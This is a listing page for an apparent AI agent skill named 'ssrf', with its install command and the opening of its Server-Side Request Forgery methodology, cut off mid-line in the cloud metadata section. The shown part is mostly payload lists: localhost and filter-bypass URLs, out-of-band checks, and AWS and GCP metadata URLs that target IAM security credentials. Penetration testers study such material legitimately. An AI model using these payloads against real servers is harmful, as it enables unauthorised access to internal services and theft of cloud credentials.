
ssrf · listed

Server-Side Request Forgery expert methodology covering basic SSRF, blind SSRF, cloud metadata endpoint attacks, DNS rebinding, and protocol smuggling. Includes filter bypass and post-exploitation pivoting.
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63
Install: claude install-skill sunilgentyala/OmniRed
# Server-Side Request Forgery (SSRF)

## Attack Surface

Any server-side feature that makes outbound requests using user-supplied URLs or hostnames: webhook URLs, document fetchers (PDF generation, URL preview), image loaders, API proxy endpoints, import from URL features, XML parsers with external entity support, PDF converters, health check endpoints.

## Methodology

### Phase 1 — Identify SSRF injection points

```
Test all URL/hostname parameters with: http://169.254.169.254/
Look for: webhook_url=, callback=, url=, endpoint=, host=, server=, destination=
Test HTTP headers: X-Forwarded-Host, Host, Referer
Check XML inputs (potential XXE with SSRF)
```

### Phase 2 — Basic SSRF verification

```
http://burpcollaborator.net   -- OOB verification
http://127.0.0.1:80           -- localhost access
http://127.0.0.1:22           -- SSH port (timing-based detection)
http://127.0.0.1:3306         -- MySQL
http://0.0.0.0                -- alternative localhost
http://[::1]                  -- IPv6 localhost
http://2130706433             -- 127.0.0.1 in decimal
```

### Phase 3 — Cloud metadata endpoint attacks

**AWS:**

```
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/
http://[fd00:ec2::254]/latest/meta-data/  (IPv6)
```

**GCP:**

```
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/ -H "Metadata-Flavor: G